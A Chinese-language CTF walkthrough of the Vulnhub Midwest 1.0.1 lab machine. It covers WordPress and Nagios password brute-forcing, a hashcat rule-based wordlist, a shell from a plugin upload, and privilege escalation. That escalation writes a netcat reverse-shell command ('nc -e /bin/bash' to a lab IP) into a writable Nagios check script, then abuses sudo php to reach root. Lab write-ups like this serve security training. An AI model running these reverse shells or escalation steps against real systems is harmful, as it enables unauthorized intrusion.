Vulnhub_Midwest 1.0.1靶机渗透测试

Midwest 1.0.1靶机


在这里插入图片描述

信息收集

  1. 发现靶机开放22和80端口

image-20230921112523320

  1. 使用目录扫描工具发现了是wordpress框架,而且发现重定向的链接是域名的形式,猜想多半需要修改hosts文件了

image-20230921112603096

web渗透

  1. 进入网站就发现css没能加载,确定需要添加域名才行

image-20230921112649216

  1. 添加完域名后,正常访问网站

image-20230921112746346

image-202309211127501763. 由于是wordpress网站,直接使用wpscan枚举后台用户名,得到admin用户

image-20230921112833271

image-20230921112838146

  1. 使用rockyou字典进行枚举密码的时候,发现跑了很久都没有成功,查看了一下wp发现其实和power有关,而且还遗漏了nagios监控系统目录,当时因为该目录是401状态码,主要也是对其不敏感,不清楚该目录的功能。还得知rockyou字典还没有wordpress后台密码

image-20230921120449181

  1. 根据wp的提示,首先去爆破nagios的登录密码,得到PowerPower,值得一提nagios监控系统的默认用户名是nagiosadmin

image-20230921114139393

image-20230921114131018

  1. 而且这个密码位于一千万行左右,耗费量可想而知

image-20230921114253106

  1. 在联合主界面的Power猜测后台登录密码也和Power有关联

image-20230921114312779

  1. 准备使用规则构建以Power为基准的密码本 aaa文件了就是Power

    hashcat --stdout aaa -r /usr/share/hashcat/rules/best64.rule -o power.txt
    

image-20230921114441456

  1. 使用密码本再次爆破后台密码得到了Power9

image-20230921114633814

image-20230921114637931

获取权限

  1. 老朋友wordpress后台getshell的方法还是很多的,这回在404.php界面写入反弹shell发现失败了,只好选择上传插件的方法来进行getshell

image-20230921114814415

  1. 上传反弹shell成功后,来到media模块下查看上传的文件,点击查看上传路径

image-20230921114828846

  1. kali主机进行监听,访问路径成功得到shell

image-20230921114946180

image-20230921114949263

权限提升 – nagios

  1. 本次靶机只有一个权限1000以上的用户nagios,而且其目录必须是本身才能访问,所以是要切换到nagios用户的

image-20230921115037375

image-20230921115136480

  1. 由于对该监控系统知之甚少,所以提权的方法也是一头雾水,根据wp了解到使用nagios系统服务提权的原理是:nagios内置了很多脚本,利用脚本生成的数据回传给nagios监控系统本身,带有check标识的脚本属于是定时执行监察系统状况的,所以只要nagios的内置脚本可以被当前用户写入,就可以插入反弹shell命令,等待脚本自动执行获取shell

  2. 来到nagios目录下,其中脚本就内置在libexec目录下

image-20230921115759210

  1. 查看其中脚本的权限,发现www-data用户全都具备可写权限,那就可以直接写入反弹shell等待执行了

image-20230921115850416

  1. 写入反弹shell到其中的脚本中,反弹shell需要添加nohub命令,为了是让执行反弹shell命令后系统不挂断,还能继续运行
echo ' nohup nc -e /bin/bash 192.168.31.46 7777 &' >custom_check_mem

image-20230921120313203

  1. 等待了两三分钟,成功接受到了nagiosshell

image-20230921120353766

  1. 发现目录下有user.txt文件

image-20230921120519026

权限提升 — root

  1. 进行常规的提权操作,发现nagios具有sudo权限,还能免密码使用php来执行一些脚本

image-20230921120715896

  1. 前去查看一下这些脚本的权限,发现了一个可以被当前用户执行写入操作,那就可以写入执行/bin/bash的命令了

image-20230921120811551

  1. 写入提权命令

image-20230921120857583

  1. 使用sudo权限调用php来执行该文件,发现需要密码的提示,不是免密码的么,查看sudo -l之后发现,遗漏了在后面*

image-20230921120953173

  1. 再次执行,成功得到了root的shell,来到root目录下查看到了flag

image-20230921121058243

靶机总结

  1. 本次靶机的难度还挺大的,隐藏的信息和不懂得知识还是有点多的
  2. 因为没有接触过nagios监控系统,所以扫描出来了该目录也没太过于关注,没想到后台密码的突破点和提权的突破点都在nagios上了
  3. nagios的默认账户为nagiosadmin,爆破得到PowerPower密码,结合界面的Power组成后台密码的隐藏信息,所有密码就是围绕Power
  4. 确定密码是围绕某个特定单词组成的,可以使用hashcat --stdout命令指定相关规则,对某得特定的单词生成相关密码本
  5. wordpress后台getshell,可以修改404.php页面,也可以上传反弹shell文件到插件中
  6. 权限提升利用到了写入反弹shellnagios系统的内置脚本,前提是脚本是当前用户可写的,要加上nohub防止系统执行反弹shell执行挂断
  7. 编译器具有sudo权限,只需要使用代码调用各自的系统函数执行/bin/bash就可以提权
  8. 使用sudo来进行提权,一定要把所给命令或者文件复制完整,避免不必要的麻烦
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值